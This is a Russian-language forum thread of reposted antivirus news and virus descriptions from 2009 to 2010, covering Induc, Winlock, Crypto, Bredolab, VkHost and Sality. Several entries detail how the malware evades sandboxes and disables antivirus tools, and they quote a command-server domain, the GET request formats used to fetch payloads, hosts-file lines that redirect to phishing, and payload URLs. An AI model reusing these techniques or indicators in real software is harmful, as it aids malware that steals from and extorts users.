Сейчас обсуждают

[M I†I S]

Программистам на заметку, решил закопипастить и тут...
На работе столкнулись с этой "проблемой"... при компиляции в делфи жутко как начинал материцо NOD32... грил мол Win32/Induc... поначалу думали код ненравицо... писали программку а получили вирус... пошли рыцо в нет... нарыли следующее:

В интернете появился специфичный для Delphi вирус. Суть его в том, что заражённая программа ищет на диске установленные версии Delphi и, если находит, изменяет файл SysConst.dcu (старая версия сохраняется под именем SysConst.bak), и после этого все программы на Delphi, скомпилированные на этом компьютере, начинают точно так же заражать Delphi на тех компьютерах, где они запускаются. Распространению вируса способствовало то, что некоторые версии популярного мессенджера QIP оказались заражены им (команда разработчиков QIP приносит за это свои извинения). Пока единственный обнаруженный вредный эффект от вируса — это то, что из-за ошибки в его коде при запуске заражённой программы возникает Runtime error 3, если ключ реестра HKEY_LOCAL_MACHINE\SOFTWARE\Borland\Delphi\x.0 (x — от 4 до 7) содержит неправильное значение параметра RootDir (для правильного значения ошибки не происходит). Видимо, просто обкатывалась технология распространения вируса.

Проверьте свои версии Delphi и, если найдёте у себя SysConst.bak, выполните следующие действия:
1. Удалите SysConst.dcu
2. Скопируйте SysConst.bak в SysConst.dcu. Важно именно скопировать, а не переименовать, чтобы SysConst.bak тоже остался на диске — это убережёт систему от повторного заражения.

Некоторые подробности и обсуждение:
http://www.delphikingdom.com/asp/answer.asp?IDAnswer=70912
forum.qip.ru/showthread.php?t=36203
forum.qip.ru/showthread.php?t=35939

UPD: этот топик не призван поливать грязью QIP, зараженным оказался и AIMP, я подозреваю что и многие другие программы. Для тех, кому лень ходить по ссылкам — разработчики QIP пересобрали сборку.

Win32/Induc.A вполне безобиден, однако представляет интерес своим механизмом распространения. Сначала происходит заражение среды Delphi, вследствие чего программы, компилированные на инфицированном компьютере, также становятся носителями кода вируса. Система раннего обнаружения угроз ESET ThreatSense.Net зафиксировала более 30 000 уникальных образцов вредоносного ПО Win32/Induc.A в течение первых 24 часов с момента внесения данного вируса в сигнатурную базу 18 августа 2009 года.

Другой интересной фишкой вируса стало то, что он также распространяется вместе с троянской программой Win32/Spy.Banker. По всей вероятности, создатели трояна сами стали жертвами таких же вирусописателей, и программа Win32/Spy.Banker была скомпилирована хакерами в среде Delphi на зараженных вирусом Win32/Induc.A компьютерах.

Что пишит по этому поводу Компания ESET:

ESET сообщает о новом вирусе Win32/Induc.A

Москва, 21 августа 2009 г. Компания ESET, международный разработчик антивирусного ПО и решений в области компьютерной безопасности, сообщает о новом вирусе Win32/Induc.A, инфицирующем программное обеспечение, написанное в среде разработки Delphi.

Вирус Win32/Induc.A не обладает деструктивными функциями, однако его оригинальный и эффективный механизмом распространения представляет чрезвычайный интерес. Сначала происходит заражение среды Delphi, вследствие чего программы, компилированные на инфицированном компьютере, также становятся носителями кода вируса. Поскольку никакой финансовой прибыли вирусописателям программа принести не может, по всей видимости, она создана из академического интереса или в качестве прототипа для другого вредоносного ПО.

Язык программирования Delphi, главным образом, применяется в отраслях с использованием обширных баз данных, например, в банковской сфере. В таких организациях Win32/Induc.A получил наибольшее распространение.

Система раннего обнаружения угроз ESET ThreatSense.Net зафиксировала более 30 000 уникальных образцов вредоносного ПО Win32/Induc.A в течение первых 24 часов с момента внесения данного вируса в сигнатурную базу 18 августа 2009 года.

«Win32/Induc.A смог заразить огромное количество ПК разработчиков программного обеспечения, использующих Delphi. Несмотря на то, что мы давно проактивно детектируем данное ПО как вредоносное, многие поставщики программных продуктов проигнорировали предупреждение ESET NOD32 о новом вирусе, ошибочно приняв его за ложное срабатывание. В результате множество копий лицензионного ПО, созданного на инфицированных компьютерах, было продано пользователям», - комментирует глава вирусной лаборатории ESET Юрай Малчо.



Примечательно, что вирус также распространяется вместе с троянской программой Win32/Spy.Banker. По всей вероятности, создатели трояна сами стали жертвами таких же вирусописателей, и программа Win32/Spy.Banker была скомпилирована хакерами в среде Delphi на зараженных вирусом Win32/Induc.A компьютерах.

Как на этот вирус реагируют другие антивирусники я хз, но стоит проверить.
Так же стоит проверить свои файлики в делфе... мож сборка вашей программы уже заражена

[lev2008]

Программистам на заметку, решил закопипастить и тут...
На работе столкнулись с этой "проблемой"... при компиляции в делфи жутко как начинал материцо NOD32... грил мол Win32/Induc... поначалу думали код ненравицо... писали программку а получили вирус... пошли рыцо в нет... нарыли следующее:
Что пишит по этому поводу Компания ESET:
Как на этот вирус реагируют другие антивирусники я хз, но стоит проверить.
Так же стоит проверить свои файлики в делфе... мож сборка вашей программы уже заражена

каспер на этот вирь тож визжит

[Feo]

Trojan-Dropper.Win32.Smser.dg

Другие названия:
Trojan-Dropper.Win32.Smser.dg [Лаборатория Касперского]
Trojan.Winlock.252 [Dr.Web]

Троянская программа-вымогатель, инсталлирует в систему другое вредоносное ПО. Рассылается по ICQ ввиде сообщений "никого не узнаёшь на этой фотке?" и ссылкой на файл foto17.gif.(может быть и другое foto*.gif)

После запуска троянец извлекает в папку WINDOWS файл 43.jpg и запускает его, иммитируя обычное открытие рисунка.


Создает файлы:
%Windir%\43.jpg
%Windir%\exxplorer.exe
%Windir%\svccost.exe
%System%\154.bat
%Windir%\xFoLOOOSErs.txt
Запускает в системе следующие процессы:
svccost.exe
Создает следующие ключи в реестре:

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network_
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network_\AFD
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network_
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network_\AFD
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\system


Изменяет следующие значения реестра:
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\system] DisableTaskMgr = 0x00000001
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon] Shell =

Соединения:
87.242.98.91
порт: 80

[Гарыч]

Conficker – по-прежнему самый опасный вирус в России http://safe.cnews.ru/news/line/index.shtml?2009/10/09/365063
Компания Eset опубликовала рейтинг самых распространенных интернет-угроз, выявленных специалистами вирусной лаборатории Eset с помощью технологии раннего обнаружения ThreatSense.Net в сентябре 2009 г.
По данным Eset, в мировом рейтинге зафиксировано увеличение вредоносного ПО, распространяющегося с помощью съемных носителей. На сегодняшний день угрозы INF/Autorun находятся на второй позиции рейтинга (7,53%). Высокий процент заражений autorun-угрозами отмечен в Объединенных Арабских Эмиратах (7,36%), Израиле (4,99%), Латвии (4,97%) и Литве (5,45%).
Первое место по-прежнему сохраняет червь Conficker (8,76%). Сегодня это угроза номер один в России (17,95%), на Украине (27,03%), в Румынии (13,64%), Болгарии (13,63%), Сербии (8,82%), Италии (7,51%), Великобритании (5,5%) и Австрии (2,83%). Также в сентябре зафиксирован резкий скачок числа инфицированных червем Conficker компьютеров в ЮАР. Количество заражений увеличилось на 100% по сравнению с предыдущим месяцем и составило 18,51%. В российской вирусной двадцатке традиционно первое и второе место занимают версии червя Win32/Conficker.AA (7,68%) и Win32/Conficker.AE (4,68%) соответственно.
Другой мировой тенденцией, отмеченной в сентябре, стало сокращение вредоносного ПО для онлайн-игр, например, для Second Life. Несмотря на это, процент заражений все еще достаточно высок – 6,36%. Трояны-кейлогеры семейства Win32/PSW.OnLineGames занимают третье место в мировом вирусном рейтинге.
В сентябре широкое распространение получили программы семейства Win32/Agent, используемые злоумышленниками для кражи информации с инфицированных компьютеров. Процент заражений составил 3,46%. Данное ПО стало угрозой номер один в Дании (3,32%), большое количество инфицированных компьютеров также было отмечено в Швеции (2,75%) и в России (3,74%).

» Спойлер (нажмите, чтобы прочесть) «

В целом, сентябрьская двадцатка самых распространенных угроз в России выглядит следующим образом:
Win32/Conficker.AA 7,68%
Win32/Conficker.AE 4,68%
INF/Autorun 4,35%
Win32/Agent 3,74%
Win32/Spy.Ursnif.A 3,44%
INF/Conficker 2,88%
INF/Autorun.gen 2,81%
Win32/Conficker.Gen 1,78%
Win32/Qhost 1,59%
Win32/Conficker.X 1,54%
Win32/Genetik 1,31%
Win32/Tifaut.C 1,31%
Win32/AutoRun.KS 1,21%
Win32/Induc.A 1,09%
Win32/AutoRun.FakeAlert.M 0,98%
Win32/Conficker.AB 0,96%
Win32/Conficker.AL 0,90%
Win32/Conficker.Gen~alg 0,87%
Win32/Sality~alg 0,81%
Win32/IRCBot.AMC 0,73%

В свою очередь, сентябрьская десятка самых распространенных угроз в мире включает:
Win32/Conficker 8,76%
INF/Autorun 7,53%
Win32/PSW.OnLineGames 6,36%
Win32/Agent 3,46%
INF/Conficker 1,99%
Win32/Qhost 1,42%
Win32/Pacex 1,34%
Win32/TrojanDownloader.Swizzor 1,13%
Win32/Autorun 0,78%
WMA/TrojanDownloader.GetCodec 0,77%

[mephisto]

Уберите из опросника: "первый раз зашел" и "просто интересно почитать", тогда точно будет смысл и соответственно можно будет сделать выводы.

Лучше я вообще уберу опрос, возражения есть?

[aksinia45]

Кто-нибудь может подсказать, что за разновидность Трояна:
Win32:Delf-MZG[Trj]
На днях подхватила пока атнивирусник не работал.
Мне пришлось удалить из-за этого вируса 4 программы.
Какие последствия после этого вируса.

[Vadim_Igrok]

Кто-нибудь может подсказать, что за разновидность Трояна:
Win32:Delf-MZG[Trj]
На днях подхватила пока атнивирусник не работал.
Мне пришлось удалить из-за этого вируса 4 программы.
Какие последствия после этого вируса.

Таже самая проблема. Думаю мне придётся удалить больше.

[Feo]

Кто-нибудь может подсказать, что за разновидность Трояна:
Win32:Delf-MZG[Trj]
На днях подхватила пока атнивирусник не работал.
Мне пришлось удалить из-за этого вируса 4 программы.
Какие последствия после этого вируса.

А у Вас случаем не Аваст стоит?
Если да, попробуйте сделать инструкции из этой статьи.
http://virusinfo.info/showthread.php?t=62213

[Laperuz]

Не,там ничего криминального,это было глобальное ложное срабатывание аваста,они принесли извинения,на самом деле это чистые программы.
P.S. на будущее-лучше всегда не удалять,а отправлять в карантин.

[Гарыч]

Virus.Win32.Crypto
Очень опасный резидентный полиморфный Win32-вирус. Размер вируса - более 20Kb. Заражает KERNEL32.DLL и PE EXE-файлы, при заражении записывает свой код в конец файла и модифицирует необходимые поля в PE-заголовке для того, чтобы получить управление при старте зараженного файла. Вирус также добавляет зараженные файлы в архивы различных типов - ACE, RAR, ZIP, CAB, ARJ, и в некоторые версии самораспаковывающихся архивов - SFX ACE и RAR.
При заражении обычных PE-файлов вирус шифрует себя полиморфик-кодом, а при заражении KERNEL32.DLL оставляет свой код незашифрованным.

» Спойлер (нажмите, чтобы прочесть) «

Вирус использует анти-отладочные приемы, отключает антивирусные резидентные мониторы Avast, AVP, AVG и Amon, уничтожает антивирусные файлы данных AVP.CRC, IVP.NTZ, ANTI-VIR.DAT, CHKLIST.MS, CHKLIST.CPS, SMARTCHK.MS, SMARTCHK.CPS, AGUARD.DAT, AVGQT.DAT; портит данные в файле LGUARD.VPS (антивирусная база данных?); не заражает файлы-антивирусы с именами: TB, F-, AW, AV, NAV, PAV, RAV, NVC, FPR, DSS, IBM, INOC, ANTI, SCN, VSAF, VSWP, PANDA, DRWEB, FSAV, SPIDER, ADINF, SONIQUE, SQSTART.
Одной из главных отличительных особенностей вируса является тот факт, что он шифрует системные библиотеки Windows (DLL-файлы). При этом используется механизм шифрования "на-лету" - при необходимости вирус расшифровывает тело библиотеки, а затем шифрует обратно. В результате библиотеки являются работоспособными только при наличии в системе резидентного вируса, а после удаления вируса из системы - остаются зашифрованными (примерно то же самое, что делает вирус Onehalf). Для шифрования библиотек вирус использует криптографическую систему, встроенную в Windows (Crypt API).
Вирус "несовместим" с некоторыми версиями Windows. При этом вирус либо не заражает KERNEL32.DLL и, соответственно, системную память, либо неспособен заражать PE EXE-файлы.
Инсталляция в систему
При первом запуске зараженного файла в незараженной системе вирус запускает свою процедуру инсталляции, которая заражает файл KERNEL32.DLL, находящийся в системном каталоге Windows. При заражении вирус правит таблицу экспортов KERNEL32 и устанавливает на свой код адреса нескольких функций работы с файлами (CreateFile, OpenFile, __lopen, CopyFile, MoveFile, MoveFileEx, LoadLibrary, LoadLibraryEx, FreeLibrary - как ANSI-функции, так и UNICODE).
В результате при следующей загрузке Windows код вируса остается в системной памяти как часть KERNEL32, и при вызове перечисленных выше функций управление передается на код вируса.
Вирус использует обычный для Win32-вирусов прием для того, чтобы записать свой код в файл KERNEL32.DLL (эта библиотека постоянна загружена в памяти и Windows блокирует запись в этот файл). Вирус копирует файл KERNEL32.DLL из системного каталога в основной каталог Windows, заражает эту копию и записывает команду "апдейта" в файл WININIT.INI. В результате при перезагрузке Windows уничтожает KERNEL32.DLL в системном каталоге и замещает его зараженной копией.
После заражения KERNEL32.DLL вирус возвращает управление программе-носителю.
Заражение файлов
При перезагрузке Windows код вируса оказывается загруженным в память Windows и получает управление при обращениях к файлам. При первом таком обращении вирус запускает процедуру размножения - эта процедура сканирует все доступные диски от C: до Z:, ищет на них PE EXE-файлы и архивы и заражает их.
Для того, чтобы замаскировать свою активность, вирус выполняет процедуру размножения в фоновом режиме и плюс к этому делает задержки при начале сканирования очередного диска.
При заражении PE EXE-файлов вирус увеличивает размер последней секции файла, шифрует себя полиморфик-методом и записывает результат в эту секцию, затем корректирует необходимые поля PE-заголовка. Стартовый адрес зараженного файла устанавливается на код вируса (на полиморфный расшифровщик).
При записи зараженных файлов в архивы вирус использует внешние утилиты архивации - создает зараженный EXE-файл и вызывает архиватор, который и добавляет вирусный файл к архиву. Зараженные файлы получают имена, случайно выбранные из списка:
INSTALL, SETUP, RUN, SOUND, CONFIG, HELP, GRATIS, CRACK, UPDATE, README
При этом к имени добавляется символ '!' - либо в начало, либо в конец имени.
Шифрование DLL-файлов
При инсталляции в систему вирус создает свой ключ шифрования (при помощи крипто-библиотеки Crypt API, встроенной в Windows). Используя этот ключ и перехват функций работы с библиотеками (LoadLibrary и FreeLibrary) вирус шифрует/расшифровывает DLL-библиотеки "на-лету".
Вирус не шифрует библиотеки со стандартными именами:
SFC, MPR, OLE32, NTDLL, GDI32, RPCRT4, USER32, RSASIG, SHELL32, CRYPT32, RSABASE, PSTOREC, KERNEL32, ADVAPI32, RUNDLL32, SFCFILES.
Не шифруются также библиотеки, перечисленные в:
System\CurrentControlSet\Control\SessionManager\KnownDLLs
System\CurrentControlSet\Control\SessionManager\Known16DLLs
Вирус сохраняет свой ключ шифрования в системном реестре в ключе:
SOFTWARE\Microsoft\Cryptography\UserKeys\Prizzy/29A и дает этому ключу имя - Kiss Of Death

Backdoor.Win32. Bredolab.d
Вредоносная программа, предназначенная для скрытого удалённого управления злоумышленником пораженным компьютером.

» Спойлер (нажмите, чтобы прочесть) «

Деструктивная активность
Проверяет наличие файлов %System%\drivers\hgfs.sys, %System%\drivers\prleth.sys, %System%\drivers\vmhgfs.sys, наличие библиотек dbghelp.dll, sbiedll.dll в своем адресном пространстве. В случае обнаружения завершается.
Проверяет ключ реестра:
HKLM\HARDWARE\Description\System\SystemBiosVersion, в этом значении ищет вхождение строки «VBOX», в случае обнаружения завершается.
Чтобы исключить возможность исполнения себя в SandBox, проверяет несоответствие:

* Имя пользователя — CurrentUser, Sandbox;

* Имя компьютера — SANDBOX;

* Имя пользователя — user и имя пользователя — USER;

* Значения ключа ProductID в HKLM\Microsoft\Windows\CurrentVersion:

o 55274-640-2673064-23950 (JoeBox)

o 76487-644-3177037-23510 (CWSandbox)

o 76487-337-8429955-22614 (Anubis)

Проверяет имя, соответствующее запускаемому файлу:

* Если имя grpconv.exe, проверяет наличие в системе процесса cfp.exe. В случае обнаружения перемещает себя в %Temp%\~TM%TempName%, завершается. В противном случае создает новый процесс svchost.exe, инжектит в него свою часть, запускает в нем новый поток, завершается.

* Если имя explorer.exe, проверяет наличие файла %Temp%\~TM27FB4A.TMP, если находит, то в HKCU\SoftWare\Microsoft\WindowsNT\CurrentVersion\Winlogon устанавливает значение ключа RunGrpCon в 1, перемещает
%Temp%\~TM27FB4A.TMP в %System%\Wbem\grpconv.exe, устанавливает у
%System%\Wbem\grpconv.exe атрибуты времени такие же как у
%System%\smss.exe, удаляет файлы %System%\grpconv.exe,
%System%\dllcache\grpconv.exe.
Создает мьютекс с именем _SYSTEM_4D2EF3A_.
Создает новый процесс svchost.exe, инжектит в него свою часть, запускает в нем новый поток, завершается.

* В случае произвольного имени, проверяет наличие в системе процесса cfp.exe. В случае обнаружения перемещает себя в %Temp%\~TM%TempName%, завершается. В противном случае копирует себя в %Temp%\~TM27FB4A.TMP, инжектит себя в explorer.exe, запускает в нем новый поток, перемещает себя в %Temp%\~TM%TempName%, завершается.

Во всех случаях осуществляет проверку соответствия загруженных в свое адресное пространство модулей kernel.dll и ntdll.dll с файлами-образами на диске в %System%. В kernel32.dll проверяет корректность функций CreateRemoteThread, WriteProcessMemory, VirtualProtectEx, VirtualAllocEx, в ntdll.dll функций — ZwAllocateVirtualMemory, ZwWriteVirtualMemory, ZwProtectVirtualMemory, ZwCreateThread, ZwAdjustPrivelegesToken, ZwOpenProcess, ZwOpenThread, ZwQueueApcThread и автоматически производит корректировку при несоответствии (anti-sandbox).

Работа svchost.exe:

Производится циклическая попытка подключения к jobfinder911.com.

При удачном подключении отправляется GET-запрос:
GET /l/controller.php?action=bot&entity_list={числа через запятую}
&uid=11&first={0|1}&guid={VolumeSerialNumber}&rnd=6293712

На основании полученного содержимого и значения поля Magic-Number, в котором хранится длина ключа и значение самого ключа, происходит расшифровка данных, которые могут записываться либо в новый файл
%Windows%\Temp\wpv%rand_number%.exe, с дальнейшим запуском файла, либо данные записываются в новый создаваемый процесс svchost (для этого случая установлен перехватчик функции ZwResumeThread из ntdll.dll, осуществляющий запись зловреда — функция вызывается из используемой CreateProcess).

Второй GET-запрос вида:
GET /l/controller.php?action=report&guid=0&rnd=6293712&uid=11&
entity={число:unique_start|unique_failed|repeat_start|repeat_failed;число:...}

Осуществляется запись служебной информации в %APPDATA%\wiaserva.log.

Trojan.Win32. VkHost.an
Троянская программа, модифицирующая файл hosts для перенаправления пользователей на фишинговые страницы.
Имеет размер 12373 байта. Ничем не упакован. Написан на Visual Basic.
После запуска вредоносной программы троянец модифицирует файл %windir%\system32\drivers\etc\hosts, дописывая в него строчки:
83.133.120.252 vkontakte.ru
83.133.120.252 odnoklassniki.ru
После этого троянская программа завершает свою работу.

[Feo]

В России эпидемия Trojan.Winlock. Заражены миллионы пользователей.

Компания «Доктор Веб» – российский разработчик средств информационной безопасности – предупреждает о том, что эпидемия троянцев семейства Trojan.Winlock набирает обороты. В январе 2010 года количество россиян, пострадавших от вредоносных программ, требующих за разблокировку Windows отправить платное SMS-сообщение, составило несколько миллионов. Предположительные потери составляют сотни миллионов рублей.

Первые модификации Trojan.Winlock появились около 3-х лет назад. На тот момент они не представляли серьезной угрозы: автоматически удалялись с компьютера через несколько часов после установки, не запускались в Безопасном режиме Windows, а стоимость SMS-cообщений, которые требовали отправить авторы троянца, была не столь высокой, как сейчас (в среднем около 10 рублей в сравнении c 300-600 рублями).

С ноября 2009 года эта схема отъема денег пользуется все большим успехом у злоумышленников – новые модификации Trojan.Winlock становятся все более опасными. За снятие сообщения о блокировке Windows, которое выскакивает поверх всех окон и делает невозможным нормальную работу на компьютере, вирусописатели требуют гораздо больше денег. Троянцы уже не удаляются автоматически из системы в прошествии некоторого времени, но приобретают дополнительный функционал. В частности, они препятствуют запуску некоторых программ в зараженной системе (файловых менеджеров, антируткитов, утилит сбора информации, которая может помочь в лечении системы).

Вредоносные программы семейства Trojan.Winlock распространяются через уязвимости в Windows (в частности, Internet Explorer), вредоносные сайты (скачиваемые кодеки), эксплойты iframe, а также ботнеты (авторы ботнета продают установку какой-либо вредоносной программы на зараженном компьютере).

Только за январь число пострадавших в России от блокировщиков Windows составило несколько миллионов пользователей. С учетом того, что средняя стоимость SMS-сообщения – 300-600 рублей, предположительные потери россиян от этого вида вредоносного ПО только в первом месяце 2010 года составили сотни миллионов рублей.

В связи с тем, что с каждым днем появляются новые модификации Trojan.Winlock, незащищенными остаются даже те пользователи, которые применяют постоянно обновляемые антивирусные решения различных производителей.

Для помощи пострадавшим компания «Доктор Веб» в специальном разделе своего официального сайта собрала всю актуальную информацию об этих троянцах. В частности, форму разблокировки, которая помогает бесплатно найти необходимый код. Только за первые 2 дня работы этого проекта, его посетили сотни тысяч пользователей.

Компания «Доктор Веб» считает необходимым привлечь внимание официальных властей к этой проблеме. Их помощь в обнаружении людей, регистрирующих номера, на которые злоумышленники требуют отправлять платные SMS-сообщения, могла бы уменьшить число потенциальных жертв. Кроме того, мы призываем операторов сотовой связи блокировать эти номера по первым же жалобам абонентов.

http://news.drweb.com/show/?i=874&c=5&p=0

[hunter967]

Для помощи пострадавшим компания «Доктор Веб» в специальном разделе своего официального сайта собрала всю актуальную информацию об этих троянцах. В частности, форму разблокировки, которая помогает бесплатно найти необходимый код. Только за первые 2 дня работы этого проекта, его посетили сотни тысяч пользователей.

А почему только компания Dr.Web трубит о Trojan.Winlock и помогает бесплатно найти необходимый код разблокировки. Или я ошибаюсь и NOD32 с каспером тоже бесплатно помогают?

[Feo]

А почему только компания Dr.Web трубит о Trojan.Winlock и помогает бесплатно найти необходимый код разблокировки. Или я ошибаюсь и NOD32 с каспером тоже бесплатно помогают?

Лаборатория Касперского тоже участвует в решении этих проблем.
Например http://support.kaspersky.ru/viruses/deblocker, http://support.kaspersky.ru/viruses/solutions?qid=208637133

NOD32 http://esetnod32.ru/support/winlock.php

[tatarnikov]

Извините если не в тему но меня АГЕНТ (mail) достал типо от меня всем моим контактом флуд всякий идет стоит каспер (я уже понял что он Г...ВО)
Может кто сталкивался стакой проблемой и как её решить

[slavar4]

Разбиваешь диск на два, диска. Ставишь систему все програмулины на С (для системы которые). Все остальное на других дисках, делаешь образ, если поймал вирусяку, переустанавливаешь за пять минут и усе, а гавнюкам энтим балалайку, а не денег
К стати вчера заловил, на безобидном сайте.... ВЫМОГАТЕЛЯ

[Feo]

Новый Sality - Sality.ag

В прошедшую пятницу (новость от 30.03.2010) специалистами ЛК была обнаружена новая модификация наиболее популярного в настоящее время полиморфного инфицирующего вируса – Sality.aa. Вирус Sality.aa последний раз менялся примерно год назад, причём незначительно, однако на протяжении двух последних лет он входит в пятерку вредоносных программ, чаще всего детектируемых на компьютерах пользователей. Все предыдущие модификации Sality не имели такого успеха. За ”aa” последовала версия ”ae”, которая использовала технику заражения EPO, но из-за простого алгоритма дешифровки и неудачной техники заражения она не стала популярной у злоумышленников. Последующие версии также не снискали популярности из-за значительного упрощения алгоритма дешифровки.

Новой разновидности была присвоена модификация ag. Почему для нас так интересен этот новый экземпляр? В ней применяется качественно новый алгоритм дешифровки и множество новых «полезных» инструкций. Мы считаем, что эта модификация в скором времени заменит устаревшую версию «аа» и станет очень популярной.

Основной функционал этого вируса – BackDoor. При попадании в систему Sality.ag первым делом устанавливает библиотеку и драйвер, который фильтрует интернет-трафик. Библиотека используется для противостояния разнообразным антивирусам и файрволам.

Ниже представлен скриншот фрагмета распакованной библиотеки, на котором содержатся строки, относящиеся как раз к такому ПО: ”avast! Self Protection”, ”NOD32krn”, ”Avira AntiVir Premium”, ”DRWEBSCD” и т.д. Sality использует в том числе один из простейших способов отключения антивирусов - он будет пытаться закрыть окна и процессы с соответствующими названиями.

Также вносятся дополнительные записи в реестр, которые отключают TaskManager, UAC, а также добавляют драйвер в ветку реестра ”System\CurrentControlSet\Control\SafeBoot”, что позволяет драйверу загрузиться в безопасном режиме.

Драйвер создаёт устройство с названием ”amsint32” и взаимодействует с ”\Device\IPFILTERDRIVER”, т.е. с драйвером фильтра IP-пакетов, что дает ему возможность фильтровать трафик. Сам файл драйвера содержится в библиотеке, которая хранится в теле вируса и упакована упаковщиком UPX.

Основное тело, в то же время, создаёт синхронизирующие объекты, чтобы обнаружить другие запуски инфицированных файлов: ”uxJLpe1m”, ”Ap1mutx7”, а также устанавливает уже упомянутую библиотеку и загружает служебные данные со страниц, на которые ведут нижеприведенные ссылки: sagocugenc.sa.funpic.de/images/*****.gif www.eleonuccorini.com/images/*****.gif www.cityofangelsmagazine.com/images/*****.gif www.21yybuyukanadolu.com/images/*****.gif yucelcavdar.com/*****.gif www.luster-adv.com/gallery/Fusion/images/*****.gif. После всех приготовлений Sality пытается подключиться к удалённому серверу и выполняет его команды, действуя, как обычный BackDoor.

Сама техника заражения осталась похожей на применяемую в модификации ”aa”. Код по точке входа заменяется переходом на основное тело. Переход представляет собой обычную инструкцию перехода по регистру – jmp reg, который очень сильно обфусцирован. Само тело имеет размер 0x11000 байт и расположено в конце последней секции, которая специально для этого расширяется. Дополнительно к флагам секции добавляется разрешение на запись и исполнение. Первая 0x1000 байт кода подвергнута мощной обфускации, но выполняет дешифровку остальной части кода. Если в модификации ”aa” применялся алгоритм RC4, то здесь используется алгоритм, который за один цикл расшифровывает два двойных слова. Каждый цикл включает в себя 0x3F итераций, в которых используются операции сложения, вычитания, сдвига и задействуется таблица двойных слов в начале инфицированного участка.

Источник

[Detectiv]

Самые опасные компьютерные вирусы

//удалено за отсутствие ссылки на первоисточник.Laperuz

Сообщение отредактировал Laperuz - 6.5.2010, 13:40

[Laperuz]

Detectiv,статья ваша? Навряд ли. Ссылку на первоисточник,либо будет удалено.

[Logitech G11]

http://forum.sibnet.ru/index.php?showtopic=637656

[terraW]

Опасность проверок на совместимость с Windows 7 13.05.2010 http://www.f1cd.ru/news/soft/626/
Интерес пользователей к наиболее значимым событиям в сфере компьютерных технологий уже давно и плодотворно используют злоумышленники, пытаясь распространить вредоносное ПО как можно быстрее и охватить при этом как можно более обширную аудиторию. Спустя полгода после официального выпуска Windows 7 уже не привлекает к себе такого внимания, однако процесс перехода на новую версию операционной системы лишь набирает обороты, чем и решили воспользоваться распространители троянской программы Trojan.Generic.3783603.
На сей раз "троян" был замаскирован под утилиту для проверки компьютера на предмет совместимости с новой ОС Windows 7 Upgrade Advisor. Не полагаясь на счастливый случай, злоумышленники применили методику прямой рассылки, отправляя пользователям по электронной почте сообщения с рекомендациями воспользоваться приложением, чтобы узнать, позволяют ли ресурсы их компьютеров использовать Windows 7. К письмам был прикреплен ZIP-архив, вместо Windows 7 Upgrade Advisor содержавший троянскую программу. Она способна не только установить на компьютер жертвы вредоносное ПО, но и открыть бэкдор, позволяющий злоумышленнику по своему усмотрению удаленно оснащать систему дополнительными инструментами.
По оценке специалистов BitDefender, эпидемия заражений Trojan.Generic.3783603 в настоящий момент лишь начинается, однако ее масштабы могут оказаться значительными благодаря успешному применению социальной инженерии. Их рекомендации на сей раз не выходят за рамки элементарной техники безопасности при работе в сети: не открывать вложения, полученные из неизвестных источников, и помнить о важности антивирусной защиты.